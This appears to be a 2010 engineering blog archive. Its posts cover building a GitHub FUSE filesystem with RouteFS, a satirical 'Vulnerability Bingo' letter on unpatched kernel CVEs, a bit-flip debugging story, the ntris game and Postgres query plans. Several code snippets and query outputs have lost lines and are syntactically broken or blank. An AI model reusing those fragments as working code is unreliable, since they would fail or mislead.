Wednesday Jul 07, 2010

Building Filesystems the Way You Build Web Apps

FUSE is awesome. While most major Linux filesystems (ext3, XFS, ReiserFS, btrfs) are built-in to the Linux kernel, FUSE is a library that lets you instead write filesystems as userspace applications. When something attempts to access the filesystem, those accesses get passed on to the FUSE application, which can then return the filesystem data.

It lets you quickly prototype and test filesystems that can run on multiple platforms without writing kernel code. You can easily experiment with strange and unusual interactions between the filesystem and your applications. You can even build filesystems without writing a line of C code.

FUSE has a reputation of being used only for toy filesystems (when are you actually going to use flickrfs?), but that's really not fair. FUSE is currently the best way to read NTFS partitions on Linux, how non-GNOME and legacy applications can access files over SFTP, SMB, and other protocols, and the only way to run ZFS on Linux.

But because the FUSE API calls separate functions for each system call (i.e. getattr, open, read, etc.), in order to write a useful filesystem you need boilerplate code to translate requests for a particular path into a logical object in your filesystem, and you need to do this in every FUSE API function you implement.

Take a page from web apps

This is the kind of problem that web development frameworks have also had to solve, since it's been a long time since a URL always mapped directly onto a file on the web server. And while there are a handful of approaches for handling URL dispatch, I've always been a fan of the URL dispatch style popularized by routing in Ruby on Rails, which was later ported to Python as the Routes library.

Routes dissociates an application's URL structure from your application's internal organization, so that you can connect arbitrary URLs to arbitrary controllers. However, a more common use of Routes involves embedding variables in the Routes configuration, so that you can support a complex and potentially arbitrary set of URLs with a comparatively simple configuration block. For instance, here is the (slightly simplified) Routes configuration from a Pylons web application:

from routes import Mapper

def make_map():
    map = Mapper()
    map.minimization = False
    # The ErrorController route (handles 404/500 error pages); it should
    # likely stay at the top, ensuring it can always be resolved
    map.connect('error/{action}/{id}', controller='error')
    map.connect('/', controller='status', action='index')
    map.connect('/{controller}', action='index')

    return map

In this example, {controller}, {action}, and {id} are variables which can match any string within that component. So, for instance, if someone were to access /spend/new within the web application, Routes would find a controller named spend, and would call the new action on that method.

RouteFS: URL routing for filesystems

Just as URLs take their inspiration from the filesystem, we can use the ideas from URL routing in our filesystem. And to make this easy, I created a project called RouteFS. RouteFS ties together FUSE and Routes, and it's great because it lets you specify your filesystem in terms of the filesystem hierarchy instead of in terms of the system calls to access it.

RouteFS was originally developed as a generalized solution to a real problem I faced while working on the Invirt project at MIT. We wanted a series of filesystem entries that were automatically updated when our database changed (specifically, we were using .k5login files to control access to a server), so we used RouteFS to build a filesystem where every filesystem lookup was resolved by a database query, ensuring that our filesystem always stayed up to date.

Today, however, we're going to be using RouteFS to build the very thing I lampooned FUSE for: toy filesystems. I'll be demonstrating how to build a simple filesystem in less than 60 lines of code. I want to continue the popular theme of exposing Web 2.0 services as filesystems, but I'm also a software engineer at a very Git- and Linux-heavy company. The popular Git repository hosting site Github has an API for interacting with the repositories hosted there, so we'll use the Python bindings for the API to build a Github filesystem, or GithubFS. GithubFS lets you examine the Git repositories on Github, as well as the different branches of those repositories.

Getting started

If you want to follow along, you'll first need to install FUSE itself, along with the Python FUSE bindings - look for a python-fuse or fuse-python package. You'll also need a few third-party Python packages: Routes, RouteFS, and github2. Routes and RouteFS are available from the Python Cheeseshop, so you can install those by running easy_install Routes RouteFS. For github2, you'll need the bleeding edge version, which you can get by running easy_install

Now then, let's start off with the basic shell of a RouteFS filesystem:


import routes
import routefs

class GithubFS(routefs.RouteFS):
    def make_map(self):
        m = routes.Mapper()
        return m

if __name__ == '__main__':

As with the web application code above, the make_map method of the GithubFS class creates, configures, and returns a Python Routes mapper, which RouteFS uses for dispatching accesses to the filesystem. The routefs.main function takes a RouteFS class and handles instantiating the class and mounting the filesystem.

Populating the filesystem

Now that we have a filesystem, let's put some files in it:


import routes
import routefs

class GithubFS(routefs.RouteFS):
    def __init__(self, *args, **kwargs):
        super(GithubFS, self).__init__(*args, **kwargs)

        # Maps user -> [projects]
        self.user_cache = {}

    def make_map(self):
        m = routes.Mapper()
        m.connect('/', controller='list_users')
        return m

    def list_users(self, **kwargs):
        return [user
            for user, projects in self.user_cache.iteritems()
            if projects]

if __name__ == '__main__':

Here, we add our first Routes mapping, connecting '/', or the root of the filesystem, to the list_users controller, which is just a method on the filesystem's class. The list_users controller returns a list of strings. When the controller that a path maps to returns a list, RouteFS automatically makes that path into a directory. To make a path be a file, you just return a single string containing the file's contents.

We'll use the user_cache attribute to keep track of the users that we've seen and their repositories. This will let us auto-populate the root of the filesystem as users get looked up.

Let's add some code to populate that cache:


from github2 import client
import routes
import routefs

class GithubFS(routefs.RouteFS):
    def __init__(self, *args, **kwargs):
        super(GithubFS, self).__init__(*args, **kwargs)

        # Maps user -> [projects]
        self.user_cache = {}
        self.github = client.Github()

    def make_map(self):
        m = routes.Mapper()
        m.connect('/', controller='list_users')
        m.connect('/{user}', controller='list_repos')
        return m

    def list_users(self, **kwargs):
        return [user
            for user, projects in self.user_cache.iteritems()
            if projects]

    def list_repos(self, user, **kwargs):
        if user not in self.user_cache:
                self.user_cache[user] = [
                    for r in self.github.repos.list(user)]
                self.user_cache[user] = None

        return self.user_cache[user]

if __name__ == '__main__':

That's enough code that we can start interacting with the filesystem:

opus:~ broder$ ./githubfs /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs/ebroder
anygit	    githubfs	 pyhesiodfs	 python-simplestar
auto-aklog  ibtsocs	 python-github2  python-zephyr
bluechips   libhesiod	 python-hesiod
debmarshal  ponyexpress  python-moira
debothena   pyafs	 python-routefs
opus:~ broder$ ls /mnt/githubfs

Users and projects and branches, oh my!

You can see a slightly more fleshed-out filesystem on (where else?) Github. GithubFS lets you look at the current SHA-1 for each branch in each repository for a user:

opus:~ broder$ ./githubfs /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs/ebroder
anygit	    githubfs	 pyhesiodfs	 python-simplestar
auto-aklog  ibtsocs	 python-github2  python-zephyr
bluechips   libhesiod	 python-hesiod
debmarshal  ponyexpress  python-moira
debothena   pyafs	 python-routefs
opus:~ broder$ ls /mnt/githubfs/ebroder/githubfs
opus:~ broder$ cat /mnt/githubfs/ebroder/githubfs/master

What next?

Want to see more examples of RouteFS? RouteFS itself includes some example filesystems, and you can see how we used RouteFS within the Invirt project. But most importantly, because RouteFS is open source, you can incorporate it into your own projects.

So, what cool tricks can you think of for dynamically generated filesystems?


Wednesday Jun 30, 2010

Let's Play Vulnerability Bingo!

Dear Fellow System Administrators,

I like excitement in my life. I go on roller coasters, I ride my bike without a helmet, I make risky financial decisions. I treat my servers no differently. When my Linux vendor releases security updates, I think: I could apply these patches, but why would I? If I did, I'd have to coordinate with my users to schedule a maintenance window for 2am on a Sunday and babysit those systems while they reboot, which is seriously annoying, hurts our availability, and interrupts my beauty sleep (and trust me, I need my beauty sleep). Plus, where's the fun in having a fully-patched system? Without open vulnerabilities, how else would I have won a ton of money in my office's Vulnerability Bingo games?

vulnerability bingo card

How can I get in on some Vulnerability Bingo action, you ask? Simple: get yourself some bingo cards, be sure not to patch your systems, and place chips on appropriate squares when your machines are compromised. Or, as a fun variant, place chips when your friends' machines get compromised! For the less adventurous, place chips as relevant Common Vulnerabilities and Exposures are announced.

What's really great is the diversity of vulnerabilities. In 2009 alone, Vulnerability Bingo featured:

physically proximate denial of service attacks (CVE-2009-1046).

local denial of service attacks (CVE-2009-0322, CVE-2009-0031, CVE-2009-0269, CVE-2009-1242, CVE-2009-2406, CVE-2009-2407, CVE-2009-2287, CVE-2009-2692, CVE-2009-2909, CVE-2009-2908, CVE-2009-3290, CVE-2009-3547, CVE-2009-3621, CVE-2009-3620) coming in at least 5 great flavors: faults, memory corruption, system crashes, hangs, and the kernel OOPS!

And the perennial favorite, remote denial of service attacks (CVE-2009-1439, CVE-2009-1633, CVE-2009-3613, CVE-2009-2903) including but not limited to system crashes, IOMMU space exhaustion, and memory consumption!

How about leaking potentially sensitive information from kernel memory (CVE-2009-0676, CVE-2009-3002, CVE-2009-3612, CVE-2009-3228) and remote access to potentially sensitive information from kernel memory (CVE-2009-1265)?

Perhaps I can interest you in some privilege escalation (CVE-2009-2406, CVE-2009-2407, CVE-2009-2692, CVE-2009-3547, CVE-2009-3620), or my personal favorites, arbitrary code execution (CVE-2009-2908) and unknown impact (CVE-2009-0065, CVE-2009-1633, CVE-2009-3638).

Sometimes you get a triple threat like CVE-2009-1895, which "makes it easier for local users to leverage the details of memory usage to (1) conduct NULL pointer dereference attacks, (2) bypass the mmap_min_addr protection mechanism, or (3) defeat address space layout randomization (ASLR)". Three great tastes that taste great together -- and a great multi-play Bingo opportunity!

Linux vendors release kernel security updates almost every month (take Red Hat for example), so generate some cards and get in on the action before you miss the next round of exciting CVEs!

Happy Hacking,

Ben Bitdiddle
System Administrator
HackMe Inc.


Thursday Jun 24, 2010

Attack of the Cosmic Rays!

It's a well-documented fact that RAM in modern computers is susceptible to occasional random bit flips due to various sources of noise, most commonly high-energy cosmic rays. By some estimates, you can even expect error rates as high as one error per 4GB of RAM per day! Many servers these days have ECC RAM, which uses extra bits to store error-correcting codes that let them correct most bit errors, but ECC RAM is still fairly rare in desktops, and unheard-of in laptops.

For me, bitflips due to cosmic rays are one of those problems I always assumed happen to "other people". I also assumed that even if I saw random cosmic-ray bitflips, my computer would probably just crash, and I'd never really be able to tell the difference from some random kernel bug.

A few weeks ago, though, I encountered some bizarre behavior on my desktop, that honestly just didn't make sense. I spent about half an hour digging to discover what had gone wrong, and eventually determined, conclusively, that my problem was a single undetected flipped bit in RAM. I can't prove whether the problem was due to cosmic rays, bad RAM, or something else, but in any case, I hope you find this story interesting and informative.

The problem

The symptom that I observed was that the expr program, used by shell scripts to do basic arithmetic, had started consistently segfaulting. This first manifested when trying to build a software project, since the GNU autotools make heavy use of this program:

[nelhage@psychotique]$ autoreconf -fvi
autoreconf: Entering directory `.'
autoreconf: not using Gettext
autoreconf: running: aclocal --force -I m4
autoreconf: tracing
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault

dmesg revealed that the segfaulting program was expr:

psychotique kernel: [105127.372705] expr[7756]: segfault at 1a70 ip 0000000000001a70 sp 00007fff2ee0cc40 error 4 in expr

And I was easily able to reproduce the problem by hand:

[nelhage@psychotique]$ expr 3 + 3
Segmentation fault

expr definitely hadn't been segfaulting as of a day ago or so, so something had clearly gone suddenly, and strangely, wrong. I had no idea what, but I decided to find out.

Check the dumb things

I run Ubuntu, so the first things I checked were the /var/log/dpkg.log and /var/log/aptitude.log files, to determine whether any suspicious packages had been upgraded recently. Perhaps Ubuntu accidentally let a buggy package slip into the release. I didn't recall doing any significant upgrades, but maybe dependencies had pulled in an upgrade I had missed.

The logs revealed I hadn't upgraded anything of note in the last several days, so that theory was out.

Next up, I checked env | grep ^LD. The dynamic linker takes input from a number of environment variables, all of whose names start with LD_. Was it possible I had somehow ended up setting some variable that was messing up the dynamic linker, causing it to link a broken library or something?

[nelhage@psychotique]$ env | grep ^LD

That, too, turned up nothing.

Start digging

I was fortunate in that, although this failure is strange and sudden, it seemed perfectly reproducible, which means I had the luxury of being able to run as many tests as I wanted to debug it.

The problem is a segfault, so I decided to pull up a debugger and figure out where it's segfaulting. First, though, I'd want debug symbols, so I could make heads or tails of the crashed program. Fortunately, Ubuntu provides debug symbols for every package they ship, in a separate repository. I already had the debug sources enabled, so I used dpkg -S to determine that expr belongs to the coreutils package:

[nelhage@psychotique]$ dpkg -S $(which expr)
coreutils: /usr/bin/expr

And installed the coreutils debug symbols:

[nelhage@psychotique]$ sudo aptitude install coreutils-dbgsym

Now, I could run expr inside gdb, catch the segfault, and get a stack trace:

[nelhage@psychotique]$ gdb --args expr 3 + 3
(gdb) run
Starting program: /usr/bin/expr 3 + 3
Program received signal SIGSEGV, Segmentation fault.
0x0000000000001a70 in ?? ()
(gdb) bt
#0  0x0000000000001a70 in ?? ()
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
#2  0x00000000004027dd in eval4 (evaluate=true) at expr.c:773
#3  0x000000000040291d in eval3 (evaluate=true) at expr.c:812
#4  0x000000000040208d in eval2 (evaluate=true) at expr.c:842
#5  0x0000000000402280 in eval1 (evaluate=<value optimized out>) at expr.c:921
#6  0x0000000000402320 in eval (evaluate=<value optimized out>) at expr.c:952
#7  0x0000000000402da5 in main (argc=2, argv=0x0) at expr.c:329

So, for some reason, the eval5 function has jumped off into an invalid memory address, which of course causes a segfault. Repeating the test a few time confirmed that the crash was totally deterministic, with the same stack trace each time. But what is eval5 trying to do that's causing it to jump off into nowhere? Let's grab the source and find out:

[nelhage@psychotique]$ apt-get source coreutils
[nelhage@psychotique]$ cd coreutils-7.4/src/
[nelhage@psychotique]$ gdb --args expr 3 + 3
# Run gdb, wait for the segfault
(gdb) up
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
745           if (nextarg (":"))
(gdb) l
740       trace ("eval5");
741     #endif
742       l = eval6 (evaluate);
743       while (1)
744         {
745           if (nextarg (":"))
746             {
747               r = eval6 (evaluate);
748               if (evaluate)
749                 {

I used the apt-get source command to download the source package from Ubuntu, and ran gdb in the source directory, so it could find the files referred to by the debug symbols. I then used the up command in gdb to go up a stack frame, to the frame where eval5 called off into nowhere.

From the source, we see that eval5 is trying to call the nextarg function. `gdb` will happily tell us where that function is supposed to be located:

(gdb) p nextarg
$1 = {_Bool (const char *)} 0x401a70 <nextarg>

Comparing that address with the address in the stack trace above, we see that they differ by a single bit. So it appears that somewhere a single bit has been flipped, causing that call to go off into nowhere.

But why?

So there's a flipped bit. But why, and how did it happen? First off, let's determine where the problem is. Is it in the expr binary itself, or is something more subtle going on?

[nelhage@psychotique]$ debsums coreutils | grep FAILED
/usr/bin/expr                                                             FAILED

The debsums program will compare checksums of files on disk with a manifest contained in the Debian package they came from. In this case, examining the coreutils package, we see that the expr binary has in fact been modified since it was installed. We can verify how it's different by downloading a new version of the package, and comparing the files:

[nelhage@psychotique]$ aptitude download coreutils
[nelhage@psychotique]$ mkdir coreutils
[nelhage@psychotique]$ dpkg -x coreutils_7.4-2ubuntu1_amd64.deb coreutils
[nelhage@psychotique]$ cmp -bl coreutils/usr/bin/expr /usr/bin/expr
 10113 377 M-^? 277 M-?

aptitude download downloads a .deb package, instead of actually doing the installation. I used dpkg -x to just extract the contents of the file, and cmp to compare the packaged expr with the installed one. -b tells cmp to list any bytes that differ, and -l tells it to list all differences, not just the first one. So we can see that two bytes differ, and by a single bit, which agrees with the failure we saw. So somehow the installed expr binary is corrupted.

So how did that happen? We can check the mtime ("modified time") field on the program to determine when the file on disk was modified (assuming, for the moment, that whatever modified it didn't fix up the mtime, which seems unlikely):

[nelhage@psychotique]$ ls -l /usr/bin/expr
-rwxr-xr-x 1 root root 111K 2009-10-06 07:06 /usr/bin/expr*

Curious. The mtime on the binary is from last year, presumably whenever it was built by Ubuntu, and set by the package manager when it installed the system. So unless something really fishy is going on, the binary on disk hasn't been touched.

Memory is a tricky thing.

But hold on. I have 12GB of RAM on my desktop, most of which, at any moment, is being used by the operating system to cache the contents of files on disk. expr is a pretty small program, and frequently used, so there's a good chance it will be entirely in cache, and my OS has basically never touched the disk to load it, since it first did so, probably when I booted my computer. So it's likely that this corruption is entirely in memory. But how can we test that? Simple: by forcing the OS to discard the cached version and re-read it from disk.

On Linux, we can do this by writing to the /proc/sys/vm/drop_caches file, as root. We'll take a checksum of the binary first, drop the caches, and compare the checksum after forcing it to be re-read:

[nelhage@psychotique]$ sha256sum /usr/bin/expr
4b86435899caef4830aaae2bbf713b8dbf7a21466067690a796fa05c363e6089  /usr/bin/expr
[nelhage@psychotique]$ echo 3 | sudo tee /proc/sys/vm/drop_caches
[nelhage@psychotique]$ sha256sum /usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  /usr/bin/expr
[nelhage@psychotique]$ sha256sum coreutils/usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  coreutils/usr/bin/expr

And behold, the file changed. The corruption was entirely in memory. And, furthermore, expr no longer segfaults, and matches the version I downloaded earlier.

(The sudo tee idiom is a common one I used to write to a file as root from a normal user shell. sudo echo 3 > /proc/sys/vm/drop_caches of course won't work because the file is still opened for writing by my shell, which doesn't have the required permissions).


As I mentioned earlier, I can't prove this was due to a cosmic ray, or even a hardware error. It could have been some OS bug in my kernel that accidentally did a wild write into my memory in a way that only flipped a single bit. But that'd be a pretty weird bug.

And in fact, since that incident, I've had several other, similar problems. I haven't gotten around to memtesting my machine, but that does suggest I might just have a bad RAM chip on my hands. But even with bad RAM, I'd guess that flipped bits come from noise somewhere -- they're just susceptible to lower levels of noise. So it could just mean I'm more susceptible to the low-energy cosmic rays that are always falling. Regardless of whatever the cause was, though, I hope this post inspires you to think about the dangers of your RAM corrupting your work, and that the tale of my debugging helps you learn some new tools that you might find useful some day.

Now that I've written this post, I'm going to go memtest my machine and check prices on ECC RAM. In the meanwhile, leave your stories in the comments -- have you ever tracked a problem down to memory corruption? What are your practices for coping with the risk of these problems?


Edited to add a note that this could well just be bad RAM, in addition to a one-off cosmic-ray event.

Wednesday Jun 16, 2010

ntris: an idea taken a step too far

About nine months ago, I lost a lot of free time to a little applet called Pentris. The addition of pentomino pieces made the gameplay quite different from the original falling block game, but I couldn't help but think that Pentris didn't go far enough. As a programmer, I had to implement the natural generalization of the game. After a much longer development cycle than I had originally anticipated, ntris is now ready. (You'll need Java to run the applet.)

In ntris, as your score increases, so does the probability that you will get increasingly large polyominoes. At the beginning, you'll only get pieces made of 1-5 squares. By the time your score gets to 100, about one piece in three will be a hexomino - and that's still just the beginning. Very few of my beta-testers have survived long enough to see a decomino. The current high is 421, by wuthefwasthat - can you beat it?

Here's a few of my most feared pieces.

You don't want to see these in your queue.
You don't want to see these in your queue.

Everyone who plays ntris is familiar with these pieces. From left to right: the mine, whose rotational symmetry and hot pink color make a deadly combination; the jerk, and its close relative, the donut, which are the smallest pieces with non-trivial homotopy; and the dog, one of the pieces I call "animals", for obvious reasons.

I've also implemented a multiplayer mode in which you can face off against another player. In play-testing, I found that a large polyomino was a much more intimidating attack than the usual garbage, so clearing lines sends larger pieces to your opponents. I think multiplayer ntris offers something no other game does: the satisfaction of making your opponent play a monstrous nonomino. They're not clearing lines anytime soon.

Dealing with a massive piece.

When you just start out playing ntris, there are a few things you should remember.

  • Don't be too greedy. Creating a deep empty column is a sure way to lose.
  • Pay attention to your queue. Plan ahead when you see a large piece coming.
  • You can hold a bad piece if you can't place it, but don't keep it there too long.
  • Use singletons to fix your board. Maneuver them into holes and bad spots.

I should also tell you about a more advanced ntris technique, "laying it across", which is a key element of higher-level play.

Lay it across

What makes ntris different from Tetris, Blockles, and Pentris? Some simple math reveals a major gameplay difference between ntris and the other games. Let's look at Tetris first. The playing field is 10 columns wide, and each piece takes up four squares. That means that, asymptotically, you have to clear 4/10 of a line with each drop. Suppose that you use a standard open column strategy and only clear lines with 4-longs. Each one clears 4 lines, and there are 6 other tetrominoes, so, you clear, on average, 4/7 of a line per piece - enough to stay alive.

At the start of ntris, you could get any of the 29 pieces made of 1-5 squares. These pieces have, on average, 4.38 squares per piece. The board is 12 columns wide, so you have to clear 4.38/12 = 0.365 lines per drop. If you use only straight pieces to clear lines, you clear on average 15 lines every 29 pieces, or 0.517 lines per piece. But clearing multiple lines at a time yields large score bonuses, so if you're greedy, you'll only clear lines when you get a 4-long or a 5-long. Naiively, this means that you only clear 9 lines every 29 pieces - 0.310 lines per piece - so you are bound to lose.

The solution is skimming, or clearing lines with the horizontal parts of your pieces. By skimming, you can clear four lines with the long-L-block and the long-J-block, as well as with the 4-long.

Skimming a long-L-block.

Similarly, when you start getting hexominoes, you can clear five lines with more than just the 5-long. If you do the math, you'll see that with a score over 100, you must use some form of skimming just to clear lines fast enough to survive. When you start to get even larger blocks, you'll have to take skimming to an extreme to deal with them. Here's a good example of how you "lay it across":

a) A nasty piece. b) Lay it across. c) Play more pieces on the same line. d) The play resolves.

To lay a piece across, play the piece such that most of it falls on a single horizontal line. Clear that line with the next few pieces. Laying it across can be counter-intuitive, since it often creates several holes in your board, but it is often the only viable way to play a piece. A word of caution: before laying a piece across, you should always think ahead a few moves, to be sure that the play will resolve quickly. Otherwise, you run the risk of covering part of your board with the piece that wouldn't go away.

Your move

I'm only an average ntris player, and we have just scratched the surface of ntris strategy. Many of you will be much better than me at this game. The server is always running, and I promise this game isn't as hard as it might seem. Can you get the high score in ntris?

Please note: ntris is my personal project and is not affiliated with or endorsed by Ksplice or the makers of Tetris. Please see for more information about Tetris.


Wednesday Jun 09, 2010

Query Planners and Baseball

I'm not a big sports aficionado. However, I'm compelled by virtue of living in Boston to care about baseball, and I just finished reading Moneyball, which is all about baseball statistics. One thing about baseball I definitely appreciate is that there are lots of published statistics, because lots of statistics means nice big public data sets available for my relational database querying pleasure.

Let's use baseball statistics as an excuse to learn more about query planners (or use query planners as an excuse to learn more about baseball, if that's how you roll):

I tend to use Postgres in my day-to-day data processing, so that's what I'm using here. My data set is from, Sean Lahman's insanely comprehensive baseball statistics archive, specifically the batting and salaries tables from Version 5.7 (1871-2009).


For starters, how many people have hit a baseball, professionally? How many people have hit home runs? How many people have hit a lot of home runs (what does 'a lot' mean in this context)? I have no idea...

We can get this information from the batting table. This is also an opportunity to look at what the Postgres query planner thinks about how to conduct read queries on a single table. To give the query planner some choices, we'll create an index on the number of home runs.

baseball# CREATE INDEX bhomers ON batting USING btree(homeruns);

Postgres is nice enough to give us a number of indexing options. In this case we're using a B-tree, which is like a binary tree's shorter, fatter cousin: each node can have many children, within a range, and it's self-balancing, so the tree can have few levels and minimize the number of expensive lookups to get to a value.

Let's get a count on everyone who's been at bat since 1871:


                                                    QUERY PLAN                                                     
 Aggregate  (cost=2609.83..2609.84 rows=1 width=9) (actual time=852.611..852.612 rows=1 loops=1)
   ->  Seq Scan on batting  (cost=0.00..2378.06 rows=92706 width=9) (actual time=0.020..27.904 rows=92706 loops=1)

 Total runtime: 852.718 ms

(3 rows)

baseball=# SELECT COUNT(DISTINCT(playerid)) FROM batting;


(1 row)

Cost is measured in estimated disk page fetches. The first cost number is the estimated start-up cost. Actions like pre-sorting would be bucketed under start up costs; for this simple query we have a startup cost of 0.00 for the sequential scan on the table. The second cost number is the estimated total cost, or the total number of disk page fetches for this query, in this case 2378.06 for the sequential scan. There are 92706 tuples in the table, so 92706/2378.06 ≈ 40 tuples per 4 KB disk page on this machine. The "actual time" numbers are in milliseconds. For bonus fun, frob some of the planner cost constants and see how that affects queries.

We can get the size of the table by itself and the size of the table along with any auxiliary data structures using something like:

baseball=# SELECT pg_size_pretty(pg_relation_size('batting')) As table_size, pg_size_pretty(pg_total_relation_size('batting')) AS table_plus_aux_size;

 table_size | table_plus_aux_size 
 11 MB      | 15 MB

(1 row)

So on this sequential scan we're working through 11 MB of data in 27.904 milliseconds. This looks like a sequential read rate of (11 MB / 27.904 ms) x (1000 ms / 1 sec) = 409 MB / sec, which would be amazing on this low-end machine, but all queries in this post were run several times and results reflect the benefit of a warm cache (and that's a story for another post!).

We have to go through every tuple in the batting table to get the count, so it makes sense that we're doing a full sequential scan. One disk seek and a big sequential read are going to be cheaper than the disk seeks incurred for random-access reads if we try to take advantage of any of the auxiliary data structures for this table.

Okay, cool, over 17,000 people have been at bat since 1871. But how many have hit homers -- more than one, so it's not a fluke. Let's increase the selectivity by adding a condition (the WHERE clause) on homeruns, the column on which we've created an index:

baseball=# EXPLAIN ANALYZE SELECT COUNT(DISTINCT(playerid)) FROM batting WHERE homeruns > 1;

                                                           QUERY PLAN                                                           
 Aggregate  (cost=2379.50..2379.51 rows=1 width=9) (actual time=218.128..218.128 rows=1 loops=1)
   ->  Bitmap Heap Scan on batting  (cost=516.91..2310.90 rows=27439 width=9) (actual time=8.241..19.220 rows=26953 loops=1)
         Recheck Cond: (homeruns > 1)
         ->  Bitmap Index Scan on bhomers  (cost=0.00..510.05 rows=27439 width=0) (actual time=7.735..7.735 rows=26953 loops=1)
               Index Cond: (homeruns > 1)

 Total runtime: 218.248 ms

(6 rows)

baseball=# SELECT COUNT(DISTINCT(playerid)) FROM batting WHERE homeruns > 1;


(1 row)

5231/17256 = 30% of batters have hit home runs. Nice!

The "actual time" rows value is 26953, so 26953 tuples, or 26953/92706 = 29% of the rows in the table, matched the homeruns condition. The query planner has been maintaining statistics on the data distributions in this table and guessed that 27439 would match the condition, which is pretty close. This is apparently selective enough to switch us over to using bitmaps. In the bitmap index scan, we traverse the bhomer index B-tree to create an in-memory mapping of homeruns to rowids that match the condition (homeruns > 1). We then create a bitmap for the rowids, setting a bit if that row appeared in the mapping. This lets us scan for the matching tuples in the table (aka the "heap", hence "bitmap heap scan") in on-disk order, minimizing disk seeks and the number of pages that have to be fetched into memory.

Let's bump up the selectivity even more and see what it takes to be a real home run juggernaut:

baseball=# EXPLAIN ANALYZE SELECT COUNT(DISTINCT(playerid)) FROM batting WHERE homeruns > 52;

                                                         QUERY PLAN                                                         
 Aggregate  (cost=376.42..376.43 rows=1 width=9) (actual time=0.550..0.550 rows=1 loops=1)
   ->  Index Scan using bhomers on batting  (cost=0.00..376.11 rows=124 width=9) (actual time=0.055..0.431 rows=23 loops=1)
         Index Cond: (homeruns > 52)

 Total runtime: 0.640 ms

(4 rows)

baseball=# SELECT COUNT(DISTINCT(playerid)) FROM batting WHERE homeruns > 52;


(1 row)

This query returned 15 players, meaning more than 52 home runs in one season puts you in the top .1% of all home run hitters. This high degree of selectivity has also switched us over to an index scan. This time, we're fetching in the order of the bhomer index. It can mean more disk seeks and page fetches to get the matching tuples, but the query is so selective that the extra jumping around is less costly than the sorting that would be required for a bitmap heap scan.

(For the baseball cave-dwellers like myself, Barry Bonds still has the most home runs in a single season, at 73)


For reads on a single table, the query planner had to decide between sequential, bitmap heap, and index scans. What happens if we throw a second table into the mix with a join?

First, for fun more indices:

baseball=# CREATE INDEX brbis ON batting USING btree(rbis);
baseball=# CREATE INDEX ssal ON salaries USING btree(salary);

And here's a join across batting and salaries that will get us information on players making lots of money who haven't completely failed to generate some RBIs in a given season:

baseball=# explain analyze select b.playerid from batting b, salaries s where b.playerid = s.playerid and b.yearid = s.yearid and s.salary > 30000000 and b.rbis > 10;

                                                          QUERY PLAN                                                           
 Hash Join  (cost=11.71..2984.29 rows=1 width=9) (actual time=51.087..51.129 rows=1 loops=1)
   Hash Cond: (((b.playerid)::text = (s.playerid)::text) AND (b.yearid = s.yearid))
   ->  Seq Scan on batting b  (cost=0.00..2609.82 rows=36275 width=13) (actual time=0.025..42.779 rows=33921 loops=1)
         Filter: (rbis > 10)
   ->  Hash  (cost=11.68..11.68 rows=2 width=13) (actual time=0.038..0.038 rows=1 loops=1)
         ->  Index Scan using ssal on salaries s  (cost=0.00..11.68 rows=2 width=13) (actual time=0.031..0.033 rows=1 loops=1)
               Index Cond: (salary > 30000000::double precision)

 Total runtime: 51.231 ms

(8 rows)

Postgres thinks the smartest thing to do is an index scan on ssal because of the high salary selectivity and a sequential scan on rbis because of the low RBI selectivity. Then do a hash join on the two tables and spit out the rows matching the filters for a snappy runtime of 51 milliseconds.

What happens if we take away the query planner's ability to use a hash join?

baseball=# set enable_hashjoin to false;
baseball=# explain analyze select b.playerid from batting b, salaries s where b.playerid = s.playerid and b.yearid = s.yearid and s.salary > 30000000 and b.rbis > 10;

                                                         QUERY PLAN
 Nested Loop  (cost=2824.10..5005.53 rows=1 width=9) (actual time=71.004..71.075 rows=1 loops=1)
   Join Filter: (((b.playerid)::text = (s.playerid)::text) AND (b.yearid = s.yearid))
   ->  Index Scan using ssal on salaries s  (cost=0.00..11.68 rows=2 width=13) (actual time=0.039..0.048 rows=1 loops=1)
         Index Cond: (salary > 30000000::double precision)
   ->  Materialize  (cost=2824.10..3364.85 rows=36275 width=13) (actual time=0.026..63.490 rows=33921 loops=1)
         ->  Seq Scan on batting b  (cost=0.00..2609.82 rows=36275 width=13) (actual time=0.018..44.113 rows=33921 loops=1)
               Filter: (rbis > 10)

 Total runtime: 71.518 ms

(8 rows)

Without a hash join at its disposal, the query planner opts for a nested loops join. In a nested loops join, we're basically doing:

for every row in salaries:
    for every row in batting:
        keep based on the join filter?

The materialize is like a cache of the filtered results of the inner loop, so it doesn't have to be reevaluated after the first iteration through the outer loop. Even if it looks inefficient, it turns out that this method isn't that much slower than a hash join.

Let's hamstring it further by disabling nested loops joins too:

baseball=# set enable_nestloop to false;
baseball=# explain analyze select b.playerid from batting b, salaries s where b.playerid = s.playerid and b.yearid = s.yearid and s.salary > 30000000 and b.rbis > 10;

                                                          QUERY PLAN
 Merge Join  (cost=5991.77..6263.62 rows=1 width=9) (actual time=374.931..374.935 rows=1 loops=1)
   Merge Cond: (((b.playerid)::text = (s.playerid)::text) AND (b.yearid = s.yearid))
   ->  Sort  (cost=5980.06..6070.74 rows=36275 width=13) (actual time=343.304..365.986 rows=26055 loops=1)
         Sort Key: b.playerid, b.yearid
         Sort Method:  external merge  Disk: 1056kB
         ->  Seq Scan on batting b  (cost=0.00..2609.82 rows=36275 width=13) (actual time=0.025..76.286 rows=33921 loops=1)
               Filter: (rbis > 10)
   ->  Sort  (cost=11.69..11.69 rows=2 width=13) (actual time=0.083..0.084 rows=1 loops=1)
         Sort Key: s.playerid, s.yearid
         Sort Method:  quicksort  Memory: 25kB
         ->  Index Scan using ssal on salaries s  (cost=0.00..11.68 rows=2 width=13) (actual time=0.045..0.046 rows=1 loops=1)
               Index Cond: (salary > 30000000::double precision)

 Total runtime: 375.410 ms

(13 rows)

Ouch. A merge join, our worst option, not only looks grossly over-complicated but is 7 times slower than the original hash join. The tuples returned from the filter on salaries are small enough to fit in memory, and so we get away with an in-memory quicksort there that is wicked fast, but there are so many RBI tuples that we're forced to do a merge sort on disk, incurring 343.3 milliseconds, over 90% of the query time in disk seeks, page fetches, and writes. There are even more ways to influence the query planner.

Bottom of the 9th

